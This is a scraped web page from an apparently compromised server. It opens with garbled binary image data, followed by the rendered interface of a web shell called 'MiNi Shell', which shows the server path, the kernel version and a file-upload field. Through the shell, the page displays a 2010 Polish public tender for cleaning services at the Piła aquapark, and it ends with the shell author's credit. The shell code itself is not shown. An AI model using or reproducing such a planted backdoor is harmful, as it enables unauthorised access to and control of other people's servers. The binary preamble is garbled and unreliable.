JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100525/133399-N-2010.html

<p class="kh_header"><b>Piła: Utrzymanie czystości i higieny w obiekcie Aquaparku w Pile</b><br>
<b>Numer ogłoszenia: 133399 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rekreacji Wodnej AQUA-PIL Sp. z o.o. w Pile , ul. A. Grottgera 4, 64-920 Piła, woj. wielkopolskie, tel. 67 213 27 83, faks 67 213 27 76.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości i higieny w obiekcie Aquaparku w Pile.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie czystości i higieny w obiekcie Aquaparku w Pile.
Prace porządkowe w Aquaparku odbywać się muszą w systemie trzyzmianowym:

- I zmiana obejmuje sprzątanie pomieszczeń biurowych, toalet, uzupełnianie środków higienicznych (pianka mydlana, papier toaletowy, ręczniki papierowe) i bieżące utrzymanie czystości na terenie całego Aquaparku oraz schody wejściowe  i podjazdy w tym wycieraczki wejściowe. Dzienny serwis sprzątający obsługiwany musi być przez minimum dwie osoby w godzinach od 06:00 do 14:00.

- II zmiana obejmuje sprzątanie toalet, uzupełnianie środków higienicznych (pianka mydlana, papier toaletowy, ręczniki papierowe) i bieżące utrzymanie czystości na terenie całego Aquaparku oraz schody wejściowe i podjazdy w tym wycieraczki wejściowe. Popołudniowy serwis sprzątający obsługiwany musi być przez minimum dwie osoby w godzinach od 14:00 do 22:00.

- III zmiana obejmuje kompleksowe sprzątanie: hali basenowej (plaża, linia brzegowa, kanały ściekowe  i brodziki, zjeżdżalnie, rury zjeżdżalni, dno niecek basenowych, jacuzzi, ściany, słupki startowe, schody, parapety, itp.); sauny: (fińska i rzymska); przebieralnie: (pływalni, lodowiska i fitness- mycie i dezynfekcja szafek, ławek, podłóg, toalet, baterii natryskowych, ścian, luster, drzwi, itp.); lodowisko/rolkownia (hala lodowiska/rolkowni , bandy lodowiska, toalety) holi, ciągów komunikacyjnych, widowni, toalet, klatek schodowych, poręczy i innych elementów stalowych, windę, itp.
Nocny serwis sprzątający obsługiwany musi być przez minimum 3 osoby w godz. od 22:00 do 06:00.  W godzinach nocnych prowadzone musi być sprzątanie z użyciem profesjonalnych maszyn szorująco- ssących, karcherów, odkurzaczy itp. 
Wykonawca zobowiązany ponadto będzie do:
- mycia okien raz na kwartał, w tym okien basenowych i innych przeszkleń w budynku z użyciem podnośnika,
- maszynowe czyszczenie podłóg w pomieszczeniach biurowych, ciągach komunikacyjnych, holach
- sprzątanie podbasenia raz na kwartał,
- mycie i dezynfekcja lin basenowych dwa razy w roku,
- dno niecek basenowych codziennie w nocy  za pomocą odkurzacza wodnego,
- kanały ściekowe raz w tygodniu,
- żaluzje okienne w hali lodowiska z użyciem podnośnika 2 razy w roku. 
Sprzątanie musi odbywać się z użyciem profesjonalnych środków, których spis oraz karty charakterystyki zostaną przedłożone Zarządowi Aquaparku.
Wybrany Wykonawca zakupi środki czystości oraz przedstawi Zamawiającemu plany pracy poszczególnych zmian z uwzględnieniem używanych środków oraz ich stężenia.
Informacje dodatkowe o budynku i wyposażeniu:
Budynek murowany z konstrukcjami żelbetowymi zawierający: 
1.basen sportowy o długości 25 m x 12,5 /6 torów pływackich/, 
2.basen rekreacyjny o nieregularnej powierzchni  z atrakcjami wodnymi i kładką drewnianą, 
3.  2 zjeżdżalnie typ rurowy /40 metrów i 70 metrów/, 
4. Zjeżdżalnia typu słoń wykonana z barwionych żywic poliestrowych, 
5.   2 sauny: sucha /obudowa ścian i sufitu drewniana z izolacją termiczną, drzwi zewnętrzne szklane, wbudowane ławki drewniane/ łaźnia parowa /obudowa ścian i podłogi mozaiką ceramiczną  z izolacją termiczną, drzwi zewnętrzne szklane, wbudowane ławki obłożone mozaiką ceramiczną/, w części wypoczywali 4 leżaki  z tworzywa sztucznego ,
6.  2 wirpoole/niecka poliestrowa Odisea/, 
7. sztuczne lodowisko ze sztuczną nawierzchnią dla rolek /nawierzchnia  o powierzchni 20,10m x 30,30 m = 609,03 m2, nawierzchnie stanowi 6767 szt. płytek ażurowych z tworzywa o nazwie sport Court Power game o wymiarach 30 x 30cm. / bandy lodowiska - stałe rozmiar pola objętego bandami 30x20 m słupki ze stali ocynkowanej ogniwo ramy band wyłożone białym tworzywem pehd o gr. 10 mm. /wykładzina gumowa przed bandami i na terenie przebieralni.
8. hala do squasha /2 korty powierzchnia wewnętrzna podłogi 2 x 62,08 = 124,16 m2, obudowa ścian panel drewniany pokryty żywicą poliestrową, przednia ściana ze szkła hartowanego, podłoga sprężysta z deski barlineckiej/, 
9.  salkę fitness,  /przyrządy gimnastyczne - czyści zamawiający/
10.siłownię,  / przyrządy gimnastyczne - czyści zamawiający/
11.widownie: siedziska kubełkowe widowni /102 szt. basen i 40 szt. lodowisko/, 
12.  3 przebieralnie /pływalni 280 szt. szafek typu L2 z płyty laminowanej HPL zamykane na zamek elektroniczny, lodowiska 262 szt. szafek typu S2 z ławeczką z płyty laminowanej HPL zamykane na zamek elektroniczny  i  fitness 138 szt. szafek typu L2 z ławeczką z płyty laminowanej HPL zamykane na kluczyk mechaniczny/,
13.  Winda osobowa rok prod. 2009/2010 ilość przystanków - 2, udźwig - 1000 kg, ilość osób 13,           
14.Materiały wykończeniowe użyte w standardowym wyposażeniu obiektu:
a)Farby:  ściany i sufity pomieszczeń zostały zagruntowane, w ciągach pieszych - farby natryskowe, tynki dekoracyjne, listwy odbojnikowe.
Malowanie farbami akrylowo-lateksowymi. Elementy drewniane zabezpieczone środkami przeciwwilgociowymi i przeciwgrzybicznymi z odpowiednią odpornością ogniową. Niewielkie zabrudzenia powierzchni można usuwać lekko wilgotną szmatką.
b)Płytki podłogowe i ścienne:
- pomieszczenia techniczne - impregnowane środkami przeciwpyłowymi, gres techniczny, płytki chemoodporne,
- hala basenowa korytarze, pomieszczenia higieniczno sanitarne związane bezpośrednio z halą basenową - płytki ceramiczne podłogowe antypoślizgowe, systemowe, basenowe,
- główne ciągi komunikacyjne - płytki podłogowe o podwyższonym standardzie wytrzymałości i ścieralności,
- pomieszczenia technologiczne - gres techniczny, płytki chemoodporne.
Do pielęgnacji gresu i fug należy stosować przeznaczone do tego celu środki czyszczące.
Utrzymywanie płytek podłogowych i ściennych w czystości chroni przed zarysowaniami powodowanymi przez piasek pozostawiony na jej powierzchni.
c) Wykładziny:
-pomieszczenia biurowe, obsługi, pokoje administracyjne wykładzina PCV barwiona w masie,
-przebieralnia i ciągi komunikacyjne na lodowisko - wykładzina gumowa do chodzenia w łyżwach.
d)Drzwi wewnętrzne, zewnętrzne i wejściowe do obiektu:
- do pomieszczeń technicznych - stalowe, ocieplone Hormann zabezpieczone antykorozyjnie, wyposażone w samozamykacze,
- holl główny - profil aluminiowy z wkładką termiczną system Yawal, k=1,1 W/(m2K), przeszklenie szkło bezpieczne, antywłamaniowe, drzwi automatycznie otwierane i zamykane.
- pozostałe - profil aluminiowy z wkładką termiczną system YAWAL , k=1,1 W/(m2K), wyposażone w samozamykacze; szklenie - szkło bezpieczne antywłamaniowe.
- stolarka wewnętrzna w pomieszczeniach suchych - systemowe, drzwi wzmocnione, laminowane  z futryną składaną.
- drzwi oddzielenia pożarowego - systemowe o odpowiedniej klasie odporności ogniowej HORMANN
- drzwi do sanitariatów - wejściowe, aluminiowe wyposażone w samozamykacz, wewnętrzne wykonane w systemie lekkich przegród systemowych,
- drzwi ewakuacyjne - wyposażone w dźwignie antypaniczne.
- przeszklenia wewnętrzne - profil aluminiowy, szklenie bezpieczne system YAWAL,
- przeszklenia zewnętrzne =- świetliki i fasady aluminiowe w systemie REYNAERS, k-1,1 W (m2K),
- drzwi ścianki kabiny - systemowe, lekka zabudowa z płyty HPL z prześwitem dolnym
Należy unikać silnych zabrudzeń powierzchni skrzydła i ościeżnicy. Do ewentualnego czyszczenia drzwi należy używać suchej lub lekko wilgotnej szmatki. Usuwanie zabrudzeń przedmiotami  o ostrych krawędziach może spowodować zarysowania laminatu, które są praktycznie niemożliwe do usunięcia.
e)Stolarka okienna:
Wbudowana stolarka okienna wykonana jest w systemie aluminium, zaopatrzona w okucia  i szklenie zespolone złożone z dwóch tafli szkła z przestrzenią międzyszybową wypełniona argonem. Okna te charakteryzuje podwyższony współczynnik izolacyjności termicznej szyby. Ze względu na wysoką szczelność stolarki zewnętrznej występuje konieczność odpowiedniego przewietrzania pomieszczeń, szczególnie w początkowym okresie eksploatacji. 
 - Czyszczenie:
Zabrudzenia od deszczu, kurzu itp. Można usuwać miękką ścierką lub szczotką i gumową ściągaczką   zastosowaniem łagodnych środków myjących, do mycia szyb.
Niedopuszczalne jest stosowanie do usuwania zabrudzeń z szyb i profili środków szorujących i rozpuszczalników (alkohole, aceton, nitro rozpuszczalniki celulozowe itp.), które mogą spowodować zmatowienie powierzchni szkła oraz profili okiennych. Stolarkę należy chronić przed kontaktem z gorącymi przedmiotami oraz bezwzględnie unikać silnych zabrudzeń, a zwłaszcza powstałych wskutek kontaktu z farbami, klejami lub agresywnymi środkami chemicznymi. Należy pamiętać, że szczególnie wrażliwym elementem stolarki jest okucie, które należy chronić przed zabrudzeniami materiałami ziarnistymi lub powodującymi korozję elementów metalowych.
 ZACHOWANIE CZYSTOŚCI W OBIEKCIE:
Pomieszczenia WC - należy stosować środki przeznaczone do mycia muszli ustępowych, umywalek, pisuarów i innych ceramicznych urządzeń sanitarnych. 
W obiekcie znajduje się 20 kabin WC zlokalizowanych w 18 pomieszczeniach wszystkie zaopatrzone w podajniki papierów toaletowych 20 szt.; dozowniki pianki mydlanej 18 szt. podajniki na ręczniki papierowe 11 szt. (+ 3 szt. w pomieszczeniach socjalnych pracowników) 8 suszarek do rąk oraz szczotki WC 20 szt., pojemniki na odpady intymne w kabinach damskich, i  18 koszy. Zamawiający do uzupełniania podajników papieru i ręczników papierowych zastrzega sobie biały papier. 
Posadzki - preparat do mycia powierzchni zmywalnych codziennego stosowania na wszystkich powierzchniach wodoodpornych takich jak płytki ceramiczne, wykładziny biurowe PCV, tworzywa sztuczne. Nie pozostawiający smug i zacieków, nadaje delikatny połysk i przyjemny zapach. Nadający się do mycia ręcznego oraz mechanicznego stosując odpowiednie stężenie.
Płytki antypoślizgowe wokół basenu - należy zastosować środek dezynfekcyjny, antybakteryjny uwzględniając dużą wilgotność oraz temperaturę.
Do utrzymania czystości dna basenu - należy zaopatrzyć się w odkurzacz wodny do czyszczenia codziennego dna basenu.
Posadzki drewniane, panele podłogowe - płyn do mycia i pielęgnacji drewna, który czyści i pielęgnuje drewniane powierzchni nie niszcząc ich struktury, nie pozostawiający smug.  
Posadzki gumowe - uniwersalny płyn do codziennego mycia i pielęgnacji wszelkiego rodzaju zmywalnych posadzek gumowych. Konserwuje oraz dzięki składnikom antystatycznym zapobiega ponownemu przyleganiu kurzu i brudu. Nie pozostawia smug, przyjemny i długotrwały zapach.
Szyby oraz powierzchnie szklane - płyn do mycia zawierający alkohol, który zapobiega powstawaniu smug, doskonała czystość i połysk bez polerowania. Do mycia omawianych powierzchni należy stosować papier pyłochłonny oraz odpowiednie ścierki.
Ramy okienne - płyn bezwzględny dla tłuszczu.
Powierzchnie chromowane - płyn do usuwania kamienia i rdzy skutecznie i bez szorowania usuwa osady, zaleca się naniesienie środka na wilgotną gąbkę lub ścierkę.
Spłukać dobrze wodą, a następnie wytrzeć do sucha dla uzyskania lśniącej powierzchni.
Balustrady i inne wykończenia ze stali nierdzewnej, winda - płyn nadajacy konserwowanej powierzchni jedwabisty połysk, przy użyciu ściereczki z mikrofibry.
Przy stosowaniu wszystkich w/w środków chemicznych należy posiadać ważne, aktualne  karty charakterystyki preparatu.
Do wykonania prac sprzątających należy stosować odpowiednio profesjonalny sprzęt oraz odzież ochronną.

UWAGA !  pomieszczenia usługowe /mała gastronomia lokale o powierzchni: 93 m2 w części basenowej budynku i  45 m2 w części lodowiska, pomieszczenie figlarni o łącznej powierzchni: 89,5 m2/ oddane                w dzierżawę prywatnemu przedsiębiorcy nie są objęte przedmiotem zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.73.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca złoży oświadczenie zgodne z art. 22</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonywali co  najmniej 2 usługi zbliżone co do zakresu i wartości  przedmiotu zamówienia. Pod pojęciem /zbliżony zakres/ należy rozumieć usługi świadczone w obiektach wielkopowierzchniowych niemniej niż 4 tys. m2 i o wartości każdej z usług, równej co najmniej 100 000 zł,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie co najmniej następującym sprzętem: 
1 maszyną szorująco-czyszczącą; z odpowiednimi nakładkami w tym nakładką szczotkującą;
1 odkurzaczem podwodnym;
1 odkurzaczem do zbierania wody z podłogi;
1 pistoletem ciśnieniowym do dezynfekcji;
2 specjalistycznymi wózkami do czyszczenia (wielofunkcyjne);
niezbędnymi do wykonywania czynności sprzątania- miotłami, szufelkami, wiadrami, menzurkami, sprzętem do mycia okien, mopami, packami do nakładania i rozprowadzania specjalistycznych środków chemicznych, ściągaczkami do ściągania specjalistycznych środków chemicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Szczegółowy wykaz środków czystości oraz plany pracy poszczególnych zmian z uwzględnieniem używanych środków oraz ich stężenia;
2) Karty charakterystyki wszystkich środków jekie wykonawca chce używać do realizacji zamówienia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.pila.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Rekreacji Wodnej Aqua-Pil Sp. z o.o.
ul. Grottgera 4,  64-920 Piła.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.06.2010 godzina 10:00, miejsce: Sekretariat Centrum Rekreacji Wodnej Aqua-Pil Sp. z o.o.
ul. Grottgera 4,  64-920 Piła.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com